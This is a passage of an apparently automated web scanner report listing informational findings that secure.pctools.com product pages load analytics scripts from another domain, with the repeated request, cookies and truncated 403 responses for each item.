__qca=P0-78397944-1300668861448;

Response

HTTP/1.1 403 Forbidden
Server: Apache
X-Powered-By: PHP/4.4.8
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Cache-Lookup: HIT from www5.pctools.com:8080
Date: Mon, 21 Mar 2011 01:14:16 GMT
Connection: close
Content-Length: 25606

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</script>
<script src='http://www.symantec.com/script/omniture/om_code.js' language = 'javascript' type='text/javascript'></script>
<script src='http://www.symantec.com/script/omniture/s_code.js' language = 'javascript' type='text/javascript'></script>
...[SNIP]...

5.19. https://secure.pctools.com/performance-toolkit/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.pctools.com
Path:   /performance-toolkit/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /performance-toolkit/ HTTP/1.1
Host: secure.pctools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=263908883.1300668855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; mbox=session#1300668855394-755649#1300671918|PC#1300668855394-755649.17#1301879658|check#true#1300670118; ccheck=deleted; IS3_History=1300223449-7-14_13-7-+35-7-+5--7+6--7+7--7+9--7+25--7+26--7+27--7+34--7+8-1-+4-1-+11-1-__13-35-5-6-7-9-25-26-27-34_11-13-35-5-6-7-9-25-26-27-34; s_pers=%20s_nr%3D1300670053344-New%7C1321406053344%3B%20event69%3Devent69%7C1321406053348%3B; isvt_visitor=jlmPiwoBC2YAAD2LaW0AAAAAABgMmTcKzhGBqG; JS9K=3yhxtCCS1UBi_oVfPrqG8MxXLmT7Pve8PcfRpnUJpBzFZ74o6Xa_KYw; IS3_GSV=DPL-2_TES-1300668856_PCT-1300669856_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=98021eb51a641ad2be30a6dcf105344e; __utma=263908883.701346139.1300668855.1300668855.1300668855.1; __utmc=263908883; __utmb=263908883.7.10.1300668855; __qca=P0-78397944-1300668861448;

Response

HTTP/1.1 403 Forbidden
Server: Apache
X-Powered-By: PHP/4.4.8
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Cache-Lookup: MISS from www7.pctools.com:8080
Date: Mon, 21 Mar 2011 01:14:23 GMT
Connection: close
Content-Length: 25606

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</script>
<script src='http://www.symantec.com/script/omniture/om_code.js' language = 'javascript' type='text/javascript'></script>
<script src='http://www.symantec.com/script/omniture/s_code.js' language = 'javascript' type='text/javascript'></script>
...[SNIP]...

5.20. https://secure.pctools.com/performance-toolkit/download/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.pctools.com
Path:   /performance-toolkit/download/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /performance-toolkit/download/ HTTP/1.1
Host: secure.pctools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=263908883.1300668855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; mbox=session#1300668855394-755649#1300671918|PC#1300668855394-755649.17#1301879658|check#true#1300670118; ccheck=deleted; IS3_History=1300223449-7-14_13-7-+35-7-+5--7+6--7+7--7+9--7+25--7+26--7+27--7+34--7+8-1-+4-1-+11-1-__13-35-5-6-7-9-25-26-27-34_11-13-35-5-6-7-9-25-26-27-34; s_pers=%20s_nr%3D1300670053344-New%7C1321406053344%3B%20event69%3Devent69%7C1321406053348%3B; isvt_visitor=jlmPiwoBC2YAAD2LaW0AAAAAABgMmTcKzhGBqG; JS9K=3yhxtCCS1UBi_oVfPrqG8MxXLmT7Pve8PcfRpnUJpBzFZ74o6Xa_KYw; IS3_GSV=DPL-2_TES-1300668856_PCT-1300669856_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=98021eb51a641ad2be30a6dcf105344e; __utma=263908883.701346139.1300668855.1300668855.1300668855.1; __utmc=263908883; __utmb=263908883.7.10.1300668855; __qca=P0-78397944-1300668861448;

Response

HTTP/1.1 403 Forbidden
Server: Apache
X-Powered-By: PHP/4.4.8
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Cache-Lookup: MISS from www4.pctools.com:8080
Date: Mon, 21 Mar 2011 01:14:24 GMT
Connection: close
Content-Length: 25606

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</script>
<script src='http://www.symantec.com/script/omniture/om_code.js' language = 'javascript' type='text/javascript'></script>
<script src='http://www.symantec.com/script/omniture/s_code.js' language = 'javascript' type='text/javascript'></script>
...[SNIP]...

5.21. https://secure.pctools.com/performance-toolkit/purchase/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.pctools.com
Path:   /performance-toolkit/purchase/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /performance-toolkit/purchase/ HTTP/1.1
Host: secure.pctools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=263908883.1300668855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; mbox=session#1300668855394-755649#1300671918|PC#1300668855394-755649.17#1301879658|check#true#1300670118; ccheck=deleted; IS3_History=1300223449-7-14_13-7-+35-7-+5--7+6--7+7--7+9--7+25--7+26--7+27--7+34--7+8-1-+4-1-+11-1-__13-35-5-6-7-9-25-26-27-34_11-13-35-5-6-7-9-25-26-27-34; s_pers=%20s_nr%3D1300670053344-New%7C1321406053344%3B%20event69%3Devent69%7C1321406053348%3B; isvt_visitor=jlmPiwoBC2YAAD2LaW0AAAAAABgMmTcKzhGBqG; JS9K=3yhxtCCS1UBi_oVfPrqG8MxXLmT7Pve8PcfRpnUJpBzFZ74o6Xa_KYw; IS3_GSV=DPL-2_TES-1300668856_PCT-1300669856_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=98021eb51a641ad2be30a6dcf105344e; __utma=263908883.701346139.1300668855.1300668855.1300668855.1; __utmc=263908883; __utmb=263908883.7.10.1300668855; __qca=P0-78397944-1300668861448;

Response

HTTP/1.1 403 Forbidden
Server: Apache
X-Powered-By: PHP/4.4.8
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Cache-Lookup: MISS from www5.pctools.com:8080
Date: Mon, 21 Mar 2011 01:14:24 GMT
Connection: close
Content-Length: 25606

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</script>
<script src='http://www.symantec.com/script/omniture/om_code.js' language = 'javascript' type='text/javascript'></script>
<script src='http://www.symantec.com/script/omniture/s_code.js' language = 'javascript' type='text/javascript'></script>
...[SNIP]...

5.22. https://secure.pctools.com/privacy-guardian/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.pctools.com
Path:   /privacy-guardian/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /privacy-guardian/ HTTP/1.1
Host: secure.pctools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=263908883.1300668855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; mbox=session#1300668855394-755649#1300671918|PC#1300668855394-755649.17#1301879658|check#true#1300670118; ccheck=deleted; IS3_History=1300223449-7-14_13-7-+35-7-+5--7+6--7+7--7+9--7+25--7+26--7+27--7+34--7+8-1-+4-1-+11-1-__13-35-5-6-7-9-25-26-27-34_11-13-35-5-6-7-9-25-26-27-34; s_pers=%20s_nr%3D1300670053344-New%7C1321406053344%3B%20event69%3Devent69%7C1321406053348%3B; isvt_visitor=jlmPiwoBC2YAAD2LaW0AAAAAABgMmTcKzhGBqG; JS9K=3yhxtCCS1UBi_oVfPrqG8MxXLmT7Pve8PcfRpnUJpBzFZ74o6Xa_KYw; IS3_GSV=DPL-2_TES-1300668856_PCT-1300669856_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=98021eb51a641ad2be30a6dcf105344e; __utma=263908883.701346139.1300668855.1300668855.1300668855.1; __utmc=263908883; __utmb=263908883.7.10.1300668855; __qca=P0-78397944-1300668861448;

Response

HTTP/1.1 403 Forbidden
Server: Apache
X-Powered-By: PHP/4.4.8
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Cache-Lookup: MISS from www6.pctools.com:8080
Date: Mon, 21 Mar 2011 01:14:25 GMT
Connection: close
Content-Length: 25606

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</script>
<script src='http://www.symantec.com/script/omniture/om_code.js' language = 'javascript' type='text/javascript'></script>
<script src='http://www.symantec.com/script/omniture/s_code.js' language = 'javascript' type='text/javascript'></script>
...[SNIP]...

5.23. https://secure.pctools.com/registry-mechanic/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.pctools.com
Path:   /registry-mechanic/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /registry-mechanic/ HTTP/1.1
Host: secure.pctools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=263908883.1300668855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; mbox=session#1300668855394-755649#1300671918|PC#1300668855394-755649.17#1301879658|check#true#1300670118; ccheck=deleted; IS3_History=1300223449-7-14_13-7-+35-7-+5--7+6--7+7--7+9--7+25--7+26--7+27--7+34--7+8-1-+4-1-+11-1-__13-35-5-6-7-9-25-26-27-34_11-13-35-5-6-7-9-25-26-27-34; s_pers=%20s_nr%3D1300670053344-New%7C1321406053344%3B%20event69%3Devent69%7C1321406053348%3B; isvt_visitor=jlmPiwoBC2YAAD2LaW0AAAAAABgMmTcKzhGBqG; JS9K=3yhxtCCS1UBi_oVfPrqG8MxXLmT7Pve8PcfRpnUJpBzFZ74o6Xa_KYw; IS3_GSV=DPL-2_TES-1300668856_PCT-1300669856_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=98021eb51a641ad2be30a6dcf105344e; __utma=263908883.701346139.1300668855.1300668855.1300668855.1; __utmc=263908883; __utmb=263908883.7.10.1300668855; __qca=P0-78397944-1300668861448;

Response

HTTP/1.1 403 Forbidden
Server: Apache
X-Powered-By: PHP/4.4.8
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Cache-Lookup: MISS from www6.pctools.com:8080
Date: Mon, 21 Mar 2011 01:14:08 GMT
Connection: close
Content-Length: 25606

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</script>
<script src='http://www.symantec.com/script/omniture/om_code.js' language = 'javascript' type='text/javascript'></script>
<script src='http://www.symantec.com/script/omniture/s_code.js' language = 'javascript' type='text/javascript'></script>
...[SNIP]...

5.24. https://secure.pctools.com/registry-mechanic/download/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.pctools.com
Path:   /registry-mechanic/download/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /registry-mechanic/download/ HTTP/1.1
Host: secure.pctools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=263908883.1300668855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; mbox=session#1300668855394-755649#1300671918|PC#1300668855394-755649.17#1301879658|check#true#1300670118; ccheck=deleted; IS3_History=1300223449-7-14_13-7-+35-7-+5--7+6--7+7--7+9--7+25--7+26--7+27--7+34--7+8-1-+4-1-+11-1-__13-35-5-6-7-9-25-26-27-34_11-13-35-5-6-7-9-25-26-27-34; s_pers=%20s_nr%3D1300670053344-New%7C1321406053344%3B%20event69%3Devent69%7C1321406053348%3B; isvt_visitor=jlmPiwoBC2YAAD2LaW0AAAAAABgMmTcKzhGBqG; JS9K=3yhxtCCS1UBi_oVfPrqG8MxXLmT7Pve8PcfRpnUJpBzFZ74o6Xa_KYw; IS3_GSV=DPL-2_TES-1300668856_PCT-1300669856_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=98021eb51a641ad2be30a6dcf105344e; __utma=263908883.701346139.1300668855.1300668855.1300668855.1; __utmc=263908883; __utmb=263908883.7.10.1300668855; __qca=P0-78397944-1300668861448;

Response

HTTP/1.1 403 Forbidden
Server: Apache
X-Powered-By: PHP/4.4.8
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Cache-Lookup: MISS from www3.pctools.com:8080
Date: Mon, 21 Mar 2011 01:14:08 GMT
Connection: close
Content-Length: 25606

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</script>
<script src='http://www.symantec.com/script/omniture/om_code.js' language = 'javascript' type='text/javascript'></script>
<script src='http://www.symantec.com/script/omniture/s_code.js' language = 'javascript' type='text/javascript'></script>
...[SNIP]...

5.25. https://secure.pctools.com/registry-mechanic/purchase/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.pctools.com
Path:   /registry-mechanic/purchase/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /registry-mechanic/purchase/ HTTP/1.1
Host: secure.pctools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=263908883.1300668855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; mbox=session#1300668855394-755649#1300671918|PC#1300668855394-755649.17#1301879658|check#true#1300670118; ccheck=deleted; IS3_History=1300223449-7-14_13-7-+35-7-+5--7+6--7+7--7+9--7+25--7+26--7+27--7+34--7+8-1-+4-1-+11-1-__13-35-5-6-7-9-25-26-27-34_11-13-35-5-6-7-9-25-26-27-34; s_pers=%20s_nr%3D1300670053344-New%7C1321406053344%3B%20event69%3Devent69%7C1321406053348%3B; isvt_visitor=jlmPiwoBC2YAAD2LaW0AAAAAABgMmTcKzhGBqG; JS9K=3yhxtCCS1UBi_oVfPrqG8MxXLmT7Pve8PcfRpnUJpBzFZ74o6Xa_KYw; IS3_GSV=DPL-2_TES-1300668856_PCT-1300669856_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=98021eb51a641ad2be30a6dcf105344e; __utma=263908883.701346139.1300668855.1300668855.1300668855.1; __utmc=263908883; __utmb=263908883.7.10.1300668855; __qca=P0-78397944-1300668861448;

Response

HTTP/1.1 403 Forbidden
Server: Apache
X-Powered-By: PHP/4.4.8
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Cache-Lookup: MISS from www6.pctools.com:8080
Date: Mon, 21 Mar 2011 01:14:09 GMT
Connection: close
Content-Length: 25606

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</script>
<script src='http://www.symantec.com/script/omniture/om_code.js' language = 'javascript' type='text/javascript'></script>
<script src='http://www.symantec.com/script/omniture/s_code.js' language = 'javascript' type='text/javascript'></script>
...[SNIP]...

5.26. https://secure.pctools.com/security-news/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.pctools.com
Path:   /security-news/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /security-news/ HTTP/1.1
Host: secure.pctools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=263908883.1300668855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; mbox=session#1300668855394-755649#1300671918|PC#1300668855394-755649.17#1301879658|check#true#1300670118; ccheck=deleted; IS3_History=1300223449-7-14_13-7-+35-7-+5--7+6--7+7--7+9--7+25--7+26--7+27--7+34--7+8-1-+4-1-+11-1-__13-35-5-6-7-9-25-26-27-34_11-13-35-5-6-7-9-25-26-27-34; s_pers=%20s_nr%3D1300670053344-New%7C1321406053344%3B%20event69%3Devent69%7C1321406053348%3B; isvt_visitor=jlmPiwoBC2YAAD2LaW0AAAAAABgMmTcKzhGBqG; JS9K=3yhxtCCS1UBi_oVfPrqG8MxXLmT7Pve8PcfRpnUJpBzFZ74o6Xa_KYw; IS3_GSV=DPL-2_TES-1300668856_PCT-1300669856_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=98021eb51a641ad2be30a6dcf105344e; __utma=263908883.701346139.1300668855.1300668855.1300668855.1; __utmc=263908883; __utmb=263908883.7.10.1300668855; __qca=P0-78397944-1300668861448;

Response

HTTP/1.1 403 Forbidden
Server: Apache
X-Powered-By: PHP/4.4.8
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Cache-Lookup: MISS from www5.pctools.com:8080
Date: Mon, 21 Mar 2011 01:14:25 GMT
Connection: close
Content-Length: 25606

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</script>
<script src='http://www.symantec.com/script/omniture/om_code.js' language = 'javascript' type='text/javascript'></script>
<script src='http://www.symantec.com/script/omniture/s_code.js' language = 'javascript' type='text/javascript'></script>
...[SNIP]...

5.27. https://secure.pctools.com/security-news/glossary/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.pctools.com
Path:   /security-news/glossary/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /security-news/glossary/ HTTP/1.1
Host: secure.pctools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=263908883.1300668855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; mbox=session#1300668855394-755649#1300671918|PC#1300668855394-755649.17#1301879658|check#true#1300670118; ccheck=deleted; IS3_History=1300223449-7-14_13-7-+35-7-+5--7+6--7+7--7+9--7+25--7+26--7+27--7+34--7+8-1-+4-1-+11-1-__13-35-5-6-7-9-25-26-27-34_11-13-35-5-6-7-9-25-26-27-34; s_pers=%20s_nr%3D1300670053344-New%7C1321406053344%3B%20event69%3Devent69%7C1321406053348%3B; isvt_visitor=jlmPiwoBC2YAAD2LaW0AAAAAABgMmTcKzhGBqG; JS9K=3yhxtCCS1UBi_oVfPrqG8MxXLmT7Pve8PcfRpnUJpBzFZ74o6Xa_KYw; IS3_GSV=DPL-2_TES-1300668856_PCT-1300669856_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=98021eb51a641ad2be30a6dcf105344e; __utma=263908883.701346139.1300668855.1300668855.1300668855.1; __utmc=263908883; __utmb=263908883.7.10.1300668855; __qca=P0-78397944-1300668861448;

Response

HTTP/1.1 403 Forbidden
Server: Apache
X-Powered-By: PHP/4.4.8
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Cache-Lookup: MISS from www6.pctools.com:8080
Date: Mon, 21 Mar 2011 01:14:25 GMT
Connection: close
Content-Length: 25606

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</script>
<script src='http://www.symantec.com/script/omniture/om_code.js' language = 'javascript' type='text/javascript'></script>
<script src='http://www.symantec.com/script/omniture/s_code.js' language = 'javascript' type='text/javascript'></script>
...[SNIP]...

5.28. https://secure.pctools.com/simple-backup/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.pctools.com
Path:   /simple-backup/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /simple-backup/ HTTP/1.1
Host: secure.pctools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=263908883.1300668855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; mbox=session#1300668855394-755649#1300671918|PC#1300668855394-755649.17#1301879658|check#true#1300670118; ccheck=deleted; IS3_History=1300223449-7-14_13-7-+35-7-+5--7+6--7+7--7+9--7+25--7+26--7+27--7+34--7+8-1-+4-1-+11-1-__13-35-5-6-7-9-25-26-27-34_11-13-35-5-6-7-9-25-26-27-34; s_pers=%20s_nr%3D1300670053344-New%7C1321406053344%3B%20event69%3Devent69%7C1321406053348%3B; isvt_visitor=jlmPiwoBC2YAAD2LaW0AAAAAABgMmTcKzhGBqG; JS9K=3yhxtCCS1UBi_oVfPrqG8MxXLmT7Pve8PcfRpnUJpBzFZ74o6Xa_KYw; IS3_GSV=DPL-2_TES-1300668856_PCT-1300669856_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=98021eb51a641ad2be30a6dcf105344e; __utma=263908883.701346139.1300668855.1300668855.1300668855.1; __utmc=263908883; __utmb=263908883.7.10.1300668855; __qca=P0-78397944-1300668861448;

Response

HTTP/1.1 403 Forbidden
Server: Apache
X-Powered-By: PHP/4.4.8
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Cache-Lookup: MISS from www5.pctools.com:8080
Date: Mon, 21 Mar 2011 01:14:24 GMT
Connection: close
Content-Length: 25606

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</script>
<script src='http://www.symantec.com/script/omniture/om_code.js' language = 'javascript' type='text/javascript'></script>
<script src='http://www.symantec.com/script/omniture/s_code.js' language = 'javascript' type='text/javascript'></script>
...[SNIP]...

5.29. https://secure.pctools.com/spyware-doctor-antivirus/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.pctools.com
Path:   /spyware-doctor-antivirus/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /spyware-doctor-antivirus/ HTTP/1.1
Host: secure.pctools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=263908883.1300668855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; mbox=session#1300668855394-755649#1300671918|PC#1300668855394-755649.17#1301879658|check#true#1300670118; ccheck=deleted; IS3_History=1300223449-7-14_13-7-+35-7-+5--7+6--7+7--7+9--7+25--7+26--7+27--7+34--7+8-1-+4-1-+11-1-__13-35-5-6-7-9-25-26-27-34_11-13-35-5-6-7-9-25-26-27-34; s_pers=%20s_nr%3D1300670053344-New%7C1321406053344%3B%20event69%3Devent69%7C1321406053348%3B; isvt_visitor=jlmPiwoBC2YAAD2LaW0AAAAAABgMmTcKzhGBqG; JS9K=3yhxtCCS1UBi_oVfPrqG8MxXLmT7Pve8PcfRpnUJpBzFZ74o6Xa_KYw; IS3_GSV=DPL-2_TES-1300668856_PCT-1300669856_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=98021eb51a641ad2be30a6dcf105344e; __utma=263908883.701346139.1300668855.1300668855.1300668855.1; __utmc=263908883; __utmb=263908883.7.10.1300668855; __qca=P0-78397944-1300668861448;

Response

HTTP/1.1 403 Forbidden
Server: Apache
X-Powered-By: PHP/4.4.8
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Cache-Lookup: MISS from www3.pctools.com:8080
Date: Mon, 21 Mar 2011 01:14:05 GMT
Connection: close
Content-Length: 25606

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</script>
<script src='http://www.symantec.com/script/omniture/om_code.js' language = 'javascript' type='text/javascript'></script>
<script src='http://www.symantec.com/script/omniture/s_code.js' language = 'javascript' type='text/javascript'></script>
...[SNIP]...

5.30. https://secure.pctools.com/spyware-doctor-antivirus/download/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.pctools.com
Path:   /spyware-doctor-antivirus/download/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /spyware-doctor-antivirus/download/ HTTP/1.1
Host: secure.pctools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=263908883.1300668855.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; mbox=session#1300668855394-755649#1300671918|PC#1300668855394-755649.17#1301879658|check#true#1300670118; ccheck=deleted; IS3_History=1300223449-7-14_13-7-+35-7-+5--7+6--7+7--7+9--7+25--7+26--7+27--7+34--7+8-1-+4-1-+11-1-__13-35-5-6-7-9-25-26-27-34_11-13-35-5-6-7-9-25-26-27-34; s_pers=%20s_nr%3D1300670053344-New%7C1321406053344%3B%20event69%3Devent69%7C1321406053348%3B; isvt_visitor=jlmPiwoBC2YAAD2LaW0AAAAAABgMmTcKzhGBqG; JS9K=3yhxtCCS1UBi_oVfPrqG8MxXLmT7Pve8PcfRpnUJpBzFZ74o6Xa_KYw; IS3_GSV=DPL-2_TES-1300668856_PCT-1300669856_GeoIP-173.193.214.243_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-softlayer.com; PHPSESSID=98021eb51a641ad2be30a6dcf105344e; __utma=263908883.701346139.1300668855.1300668855.1300668855.1; __utmc=263908883; __utmb=263908883.7.10.1300668855; __qca=P0-78397944-1300668861448;

Response

HTTP/1.1 403 Forbidden
Server: Apache
X-Powered-By: PHP/4.4.8
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
X-Cache-Lookup: MISS from www7.pctools.com:8080
Date: Mon, 21 Mar 2011 01:14:06 GMT
Connection: close
Content-Length: 25606

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
</script>
<script src='http://www.symantec.com/script/omniture/om_code.js' language = 'javascript' type='text/javascript'></script>
<script src='http://www.symantec.com/script/omniture/s_code.js' language = 'javascript' type='text/javascript'></script>
...[SNIP]...

5.31. https://secure.pctools.com/spyware-doctor-antivirus/purchase/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.pctools.com
